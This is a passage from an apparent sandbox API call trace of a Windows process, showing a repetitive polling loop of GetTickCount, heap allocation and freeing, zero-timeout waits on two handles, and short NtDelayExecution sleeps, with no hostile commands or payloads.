lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.213] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.213] GetTickCount () returned 0x20e0f2b [0188.213] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.213] GetTickCount () returned 0x20e0f2b [0188.213] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.213] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0188.213] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.218] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.219] GetTickCount () returned 0x20e17c1 [0188.219] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0188.219] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.219] GetTickCount () returned 0x20e17c1 [0188.219] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.219] GetTickCount () returned 0x20e17c1 [0188.219] GetTickCount () returned 0x20e17c1 [0188.219] GetTickCount () returned 0x20e17c1 [0188.219] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.219] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.219] GetTickCount () returned 0x20e17c1 [0188.219] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.219] GetTickCount () returned 0x20e17c1 [0188.219] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.220] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0188.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.224] GetTickCount () returned 0x20e2057 [0188.224] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0188.224] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.224] GetTickCount () returned 0x20e2057 [0188.224] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.224] GetTickCount () returned 0x20e2057 [0188.224] GetTickCount () returned 0x20e2057 [0188.224] GetTickCount () returned 0x20e2057 [0188.224] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.224] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.224] GetTickCount () returned 0x20e2057 [0188.224] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.224] GetTickCount () returned 0x20e2057 [0188.224] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.224] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0188.224] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.227] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.229] GetTickCount () returned 0x20e28fc [0188.229] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.229] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.229] GetTickCount () returned 0x20e28fc [0188.229] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.229] GetTickCount () returned 0x20e28fc [0188.229] GetTickCount () returned 0x20e28fc [0188.229] GetTickCount () returned 0x20e28fc [0188.229] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.229] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.229] GetTickCount () returned 0x20e28fc [0188.229] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.229] GetTickCount () returned 0x20e28fc [0188.229] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.229] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.232] GetTickCount () returned 0x20e3192 [0188.232] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.232] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.232] GetTickCount () returned 0x20e3192 [0188.232] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.232] GetTickCount () returned 0x20e3192 [0188.232] GetTickCount () returned 0x20e3192 [0188.232] GetTickCount () returned 0x20e3192 [0188.232] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.232] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.232] GetTickCount () returned 0x20e3192 [0188.232] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.232] GetTickCount () returned 0x20e3192 [0188.233] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.233] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.236] GetTickCount () returned 0x20e3a28 [0188.236] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0188.236] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.236] GetTickCount () returned 0x20e3a28 [0188.236] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.236] GetTickCount () returned 0x20e3a28 [0188.236] GetTickCount () returned 0x20e3a28 [0188.236] GetTickCount () returned 0x20e3a28 [0188.236] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.236] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.236] GetTickCount () returned 0x20e3a28 [0188.236] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.236] GetTickCount () returned 0x20e3a28 [0188.236] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.236] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0188.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.239] GetTickCount () returned 0x20e42be [0188.239] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0188.239] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.239] GetTickCount () returned 0x20e42be [0188.239] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.239] GetTickCount () returned 0x20e42be [0188.239] GetTickCount () returned 0x20e42be [0188.239] GetTickCount () returned 0x20e42be [0188.239] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.239] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.239] GetTickCount () returned 0x20e42be [0188.239] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.239] GetTickCount () returned 0x20e42be [0188.239] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.240] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0188.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.247] GetTickCount () returned 0x20e4b64 [0188.247] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.247] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.247] GetTickCount () returned 0x20e4b64 [0188.247] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.247] GetTickCount () returned 0x20e4b64 [0188.247] GetTickCount () returned 0x20e4b64 [0188.247] GetTickCount () returned 0x20e4b64 [0188.247] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.247] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.247] GetTickCount () returned 0x20e4b64 [0188.247] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.247] GetTickCount () returned 0x20e4b64 [0188.247] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.248] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.251] GetTickCount () returned 0x20e53fa [0188.251] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0188.251] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.251] GetTickCount () returned 0x20e53fa [0188.251] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.251] GetTickCount () returned 0x20e53fa [0188.251] GetTickCount () returned 0x20e53fa [0188.251] GetTickCount () returned 0x20e53fa [0188.251] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.251] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.251] GetTickCount () returned 0x20e53fa [0188.251] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.251] GetTickCount () returned 0x20e53fa [0188.251] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.251] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0188.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.255] GetTickCount () returned 0x20e5c90 [0188.255] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0188.255] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.255] GetTickCount () returned 0x20e5c90 [0188.255] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.255] GetTickCount () returned 0x20e5c90 [0188.255] GetTickCount () returned 0x20e5c90 [0188.255] GetTickCount () returned 0x20e5c90 [0188.255] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.255] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.255] GetTickCount () returned 0x20e5c90 [0188.255] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.255] GetTickCount () returned 0x20e5c90 [0188.255] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.255] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0188.255] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.259] GetTickCount () returned 0x20e6536 [0188.259] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0188.259] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.259] GetTickCount () returned 0x20e6536 [0188.259] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.259] GetTickCount () returned 0x20e6536 [0188.259] GetTickCount () returned 0x20e6536 [0188.259] GetTickCount () returned 0x20e6536 [0188.259] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.259] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.259] GetTickCount () returned 0x20e6536 [0188.259] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.259] GetTickCount () returned 0x20e6536 [0188.259] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.259] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0188.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.261] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.263] GetTickCount () returned 0x20e6dcc [0188.263] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.263] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.263] GetTickCount () returned 0x20e6dcc [0188.263] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.263] GetTickCount () returned 0x20e6dcc [0188.263] GetTickCount () returned 0x20e6dcc [0188.263] GetTickCount () returned 0x20e6dcc [0188.263] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.263] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.263] GetTickCount () returned 0x20e6dcc [0188.263] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.263] GetTickCount () returned 0x20e6dcc [0188.263] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.263] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.263] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.267] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.268] GetTickCount () returned 0x20e7662 [0188.268] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64eb0 [0188.268] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.268] GetTickCount () returned 0x20e7662 [0188.268] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.268] GetTickCount () returned 0x20e7662 [0188.268] GetTickCount () returned 0x20e7662 [0188.268] GetTickCount () returned 0x20e7662 [0188.268] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.268] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.268] GetTickCount () returned 0x20e7662 [0188.268] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.268] GetTickCount () returned 0x20e7662 [0188.268] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.268] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64eb0 | out: hHeap=0x2150000) returned 1 [0188.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.272] GetTickCount () returned 0x20e7ef8 [0188.272] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0188.272] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.272] GetTickCount () returned 0x20e7ef8 [0188.272] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.272] GetTickCount () returned 0x20e7ef8 [0188.272] GetTickCount () returned 0x20e7ef8 [0188.272] GetTickCount () returned 0x20e7ef8 [0188.272] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.272] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.272] GetTickCount () returned 0x20e7ef8 [0188.272] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.272] GetTickCount () returned 0x20e7ef8 [0188.272] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.272] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0188.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.279] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.280] GetTickCount () returned 0x20e879d [0188.280] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0188.280] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.280] GetTickCount () returned 0x20e879d [0188.280] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.280] GetTickCount () returned 0x20e879d [0188.280] GetTickCount () returned 0x20e879d [0188.280] GetTickCount () returned 0x20e879d [0188.280] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.280] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.280] GetTickCount () returned 0x20e879d [0188.280] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.280] GetTickCount () returned 0x20e879d [0188.280] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.281] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0188.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.284] GetTickCount () returned 0x20e9033 [0188.284] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0188.284] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.284] GetTickCount () returned 0x20e9033 [0188.284] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.284] GetTickCount () returned 0x20e9033 [0188.284] GetTickCount () returned 0x20e9033 [0188.284] GetTickCount () returned 0x20e9033 [0188.284] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.284] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.284] GetTickCount () returned 0x20e9033 [0188.284] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.284] GetTickCount () returned 0x20e9033 [0188.284] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.284] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0188.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.288] GetTickCount () returned 0x20e98c9 [0188.288] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.288] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.288] GetTickCount () returned 0x20e98c9 [0188.288] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.288] GetTickCount () returned 0x20e98c9 [0188.288] GetTickCount () returned 0x20e98c9 [0188.288] GetTickCount () returned 0x20e98c9 [0188.288] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.288] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.288] GetTickCount () returned 0x20e98c9 [0188.288] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.288] GetTickCount () returned 0x20e98c9 [0188.288] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.288] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.291] GetTickCount () returned 0x20ea16f [0188.291] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0188.291] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.291] GetTickCount () returned 0x20ea16f [0188.291] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.291] GetTickCount () returned 0x20ea16f [0188.291] GetTickCount () returned 0x20ea16f [0188.291] GetTickCount () returned 0x20ea16f [0188.291] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.291] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.291] GetTickCount () returned 0x20ea16f [0188.291] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.291] GetTickCount () returned 0x20ea16f [0188.291] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.291] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0188.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.296] GetTickCount () returned 0x20eaa05 [0188.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0188.296] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.296] GetTickCount () returned 0x20eaa05 [0188.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.296] GetTickCount () returned 0x20eaa05 [0188.296] GetTickCount () returned 0x20eaa05 [0188.296] GetTickCount () returned 0x20eaa05 [0188.296] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.296] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.296] GetTickCount () returned 0x20eaa05 [0188.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.297] GetTickCount () returned 0x20eaa05 [0188.297] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.297] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0188.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.302] GetTickCount () returned 0x20eb29b [0188.302] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0188.302] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.302] GetTickCount () returned 0x20eb29b [0188.302] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.302] GetTickCount () returned 0x20eb29b [0188.302] GetTickCount () returned 0x20eb29b [0188.302] GetTickCount () returned 0x20eb29b [0188.302] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.302] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.302] GetTickCount () returned 0x20eb29b [0188.302] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.302] GetTickCount () returned 0x20eb29b [0188.302] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.302] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0188.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.310] GetTickCount () returned 0x20ebb41 [0188.311] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0188.311] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.311] GetTickCount () returned 0x20ebb41 [0188.311] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.311] GetTickCount () returned 0x20ebb41 [0188.311] GetTickCount () returned 0x20ebb41 [0188.311] GetTickCount () returned 0x20ebb41 [0188.311] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.311] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.311] GetTickCount () returned 0x20ebb41 [0188.311] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.311] GetTickCount () returned 0x20ebb41 [0188.311] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.311] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0188.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.314] GetTickCount () returned 0x20ec3d7 [0188.314] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.314] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.314] GetTickCount () returned 0x20ec3d7 [0188.314] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.314] GetTickCount () returned 0x20ec3d7 [0188.314] GetTickCount () returned 0x20ec3d7 [0188.314] GetTickCount () returned 0x20ec3d7 [0188.314] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, 